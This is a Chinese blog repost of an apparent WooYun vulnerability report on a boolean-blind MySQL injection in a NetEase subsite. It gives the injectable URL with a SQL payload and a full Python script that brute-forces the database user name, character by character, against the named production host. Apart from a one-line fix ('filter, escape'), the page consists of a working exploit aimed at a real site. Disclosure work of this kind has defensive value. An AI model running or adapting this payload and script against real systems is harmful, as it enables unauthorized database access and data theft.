记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

网易某站点MySQL注射(附python脚本)

2016-07-01 09:15

注射点:

code 区域
http://m.zibo.house.163.com/jingmeil" and mid(lower(user()),1,1)="m" and "1"="1/p/1



path中的第一个参数可以注射。MySQL bool blind.

漏洞证明:

猜解user()

code 区域
[email protected] 



m.zibo.house.163.com.mysqli.png



python脚本:

code 区域
#encoding=utf-8

import httplib

import time

import string

import sys

import random

import urllib

import urllib





headers = {'User-Agent': 'Mozilla/5.0'}

payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')



print 'Start to retrive MySQL User:'

user = ''



for i in range(1,26): #length of user() is 25

for payload in payloads:

print '.',

conn = httplib.HTTPConnection('m.zibo.house.163.com', timeout=60)

s = '/jingmeil"' + urllib.quote('and mid(lower(user()),%s,1)="%s" and "1"="1' % (i, payload)) + '/p/1'

conn.request(method='GET', url=s, headers=headers)

resp = conn.getresponse()

conn.close()

if resp.status == 200:

user += payload

print '\n[Scan in progress] %s' % user

break



print '\n[Done]MySQL user is ' + user

修复方案:

过滤,转义

知识来源: www.wooyun.org/bugs/wooyun-2016-0209010

阅读:98785 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“网易某站点MySQL注射(附python脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云